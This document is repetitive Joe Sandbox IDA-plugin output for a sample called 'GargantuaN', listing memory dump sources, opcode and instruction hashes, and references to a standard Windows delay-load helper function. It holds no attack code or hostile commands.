                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 92290e448dcd68a979cd8eb0c82c7d7801fc91154a9945d5224b4f25e9564a94
                                                        • Instruction ID: dad96d6769fa54bf5db4ad29eb72c9844ad4b426e904d8bbc9385ee93bddd41a
                                                        • Opcode Fuzzy Hash: 92290e448dcd68a979cd8eb0c82c7d7801fc91154a9945d5224b4f25e9564a94
                                                        • Instruction Fuzzy Hash: 3EB012D92A8300EE3144A2091D03C37030CC0C1B10330803EF80AC1280DC60AD0D2971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 19f5fb1ca259b5455531d41e5ef46c251e55de84c49dad6fedd3452de71a46b6
                                                        • Instruction ID: 7d2cae16b5a7815d2830073e287a50c5d993781eaa1074b4ae70d7e0ebb3dcf9
                                                        • Opcode Fuzzy Hash: 19f5fb1ca259b5455531d41e5ef46c251e55de84c49dad6fedd3452de71a46b6
                                                        • Instruction Fuzzy Hash: 25B012E92A8200EE3144A1091D12C37030CC0C1F10330403EF806C1184DC50AE092D71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 2845a82f3e3036e1ce2dbdf5440bc89c213319fed390c05de299142e58ead56a
                                                        • Instruction ID: 276be28f74115668456c065b55cf1b2d80976002e0157a397fa915cba2246c5d
                                                        • Opcode Fuzzy Hash: 2845a82f3e3036e1ce2dbdf5440bc89c213319fed390c05de299142e58ead56a
                                                        • Instruction Fuzzy Hash: 20B012E9268200EE3144A10A1C02C37030CC0C1F10330403EF806C1184D860AD082D71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 98a72cf7584657aa3658e1184e67b8220058c7c9e150ac779f1b5484a57f32b0
                                                        • Instruction ID: e664cd1017bd2dbaa64e3d6d72a3704dbce5f2faa56e09fae9e403e49651d55f
                                                        • Opcode Fuzzy Hash: 98a72cf7584657aa3658e1184e67b8220058c7c9e150ac779f1b5484a57f32b0
                                                        • Instruction Fuzzy Hash: 09B012E9268300FE3184A1091C02C37030CC0C1F10330413EF806C1184D850BD482D71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 31514d7db58ac4990f68b9b0ecc38290d44edefc28b92160fe5c28752b179785
                                                        • Instruction ID: bdda2c76661e118fdcffda651437dc30766a9a5805b80c336352e4c2125ad628
                                                        • Opcode Fuzzy Hash: 31514d7db58ac4990f68b9b0ecc38290d44edefc28b92160fe5c28752b179785
                                                        • Instruction Fuzzy Hash: 61B012E9268100FE3144B1041D03C37030CC4C1B11330D03EF805D2280E8408C091A73
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 78e3d36b58b764ee6ea3198af7feff5449dbe6fa2aea981b1907fd9957eb65a7
                                                        • Instruction ID: 02f9fa22dd401ae5fabd9cbb48cea99f01c648a66dceea32d1ff158056bcdedb
                                                        • Opcode Fuzzy Hash: 78e3d36b58b764ee6ea3198af7feff5449dbe6fa2aea981b1907fd9957eb65a7
                                                        • Instruction Fuzzy Hash: 93B012E92A8100FE314471041E03C77430CC5C1B11330D03EF505D2280E8404C0E1973
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: ef3285234239464f33fd3a602810fb798ce3ebe2c5974a5dd68677c3c0d9eb38
                                                        • Instruction ID: a6c35435052ad682f341242e135aeca690ec48aca2cd10e8ba624c70db6846d2
                                                        • Opcode Fuzzy Hash: ef3285234239464f33fd3a602810fb798ce3ebe2c5974a5dd68677c3c0d9eb38
                                                        • Instruction Fuzzy Hash: 06B012F9268000FE3144B1045D03C37031CC8C1F11330903EF805D2280E8408E051973
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 2b3137356c226b9f4bbce96ed6f931a8edb139dd4f1894f84fcf7477287eb652
                                                        • Instruction ID: 4f47c11820163cce4543f2a54392e69dff9ee4ae7b8f716fd1daba08cb9e2298
                                                        • Opcode Fuzzy Hash: 2b3137356c226b9f4bbce96ed6f931a8edb139dd4f1894f84fcf7477287eb652
                                                        • Instruction Fuzzy Hash: ABB012D926C110FF314462591C03C37030CC0C0B10330503EF406C2180F8504C041972
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 298d21e3d4d41ec7c8aa2a63077e989c2696b8e22ce512606d7f218cb2cb8e3b
                                                        • Instruction ID: 2b5a79e1ed1ff85fab9f528aaa15e93a036b855a52d2c9ad391fc2df427c8400
                                                        • Opcode Fuzzy Hash: 298d21e3d4d41ec7c8aa2a63077e989c2696b8e22ce512606d7f218cb2cb8e3b
                                                        • Instruction Fuzzy Hash: AFB012D926C210FE318461595C03C37031CC0C0B10330523EF406C2180F8405C441972
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: aed257a33c35f951e2d9bc70d80aaa26078f5a16dcccd99032a4a3c8c3783154
                                                        • Instruction ID: 48ca4ceb4b469d2261b2cb7abc0bc8149ebd99ffd376bb94112895e548ad6891
                                                        • Opcode Fuzzy Hash: aed257a33c35f951e2d9bc70d80aaa26078f5a16dcccd99032a4a3c8c3783154
                                                        • Instruction Fuzzy Hash: 24B012D92AC110FE314461595D03C37031CC0C0B10330523EF406C2180FC404D051972
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 355c19f0d425da03a2a22b0dc1b4d4013c2ee8b5eff9e3bda19bd978164994c8
                                                        • Instruction ID: 67ea6d3df7777cfd3f2f5cdf4fc01ed8eefc28d4fc22c6278634199afce4242a
                                                        • Opcode Fuzzy Hash: 355c19f0d425da03a2a22b0dc1b4d4013c2ee8b5eff9e3bda19bd978164994c8
                                                        • Instruction Fuzzy Hash: 83B012D926C100FE324471089C03C7B030CC4C1F10330523EF406C11C0F8405C481971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: c855e0100a0486da1bbb82006e05fe1b7a16659011e086646b52a47289e83e3f
                                                        • Instruction ID: 86f1286442a9dcfe2c45a2121e0951c1b0642373be3c44e6efecb1110d9d23cc
                                                        • Opcode Fuzzy Hash: c855e0100a0486da1bbb82006e05fe1b7a16659011e086646b52a47289e83e3f
                                                        • Instruction Fuzzy Hash: 35B012D9268000FE310431285C07C7B030CC4C1F10330513EF452C04C1F8504D081871
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 84362904c9dc02f18d78faed5102d1fcbc8461fd4b8b22038532545d92f7fbf7
                                                        • Instruction ID: 1549b65ef0dc40b70827c2ec448966999bb88cb2556b41b196cf55adb07bacfd
                                                        • Opcode Fuzzy Hash: 84362904c9dc02f18d78faed5102d1fcbc8461fd4b8b22038532545d92f7fbf7
                                                        • Instruction Fuzzy Hash: 6BB012D9268000FF314471085C03D7B030CC4C1F10330503EF406C11C0F8504C041971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 69bb6e7060deca3cc8131ae4f9add1ce64df54fe58e22f923472ece22fed2684
                                                        • Instruction ID: e035ecd1614cbeb6031b08b34352199d1a7a27ec675ea146e14b11e361a69171
                                                        • Opcode Fuzzy Hash: 69bb6e7060deca3cc8131ae4f9add1ce64df54fe58e22f923472ece22fed2684
                                                        • Instruction Fuzzy Hash: DBB012D92A8040FF314471085D03C7B070CC5C1F10330903EF406C11C0F8404C051971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 5539603ac5dbbb47a7d892f4911e373a95169d48a051e090d63ff123fe4f17cc
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 5539603ac5dbbb47a7d892f4911e373a95169d48a051e090d63ff123fe4f17cc
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 20b60635f2d7b62a97709415c0623beef81b9e9273c338f6ba5ca6c5c272336c
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 20b60635f2d7b62a97709415c0623beef81b9e9273c338f6ba5ca6c5c272336c
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: e7fbb0e0fe0b0e7cdd7cb07e9d2f0750755910bef9312f3baec5480e9c8c4cd0
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: e7fbb0e0fe0b0e7cdd7cb07e9d2f0750755910bef9312f3baec5480e9c8c4cd0
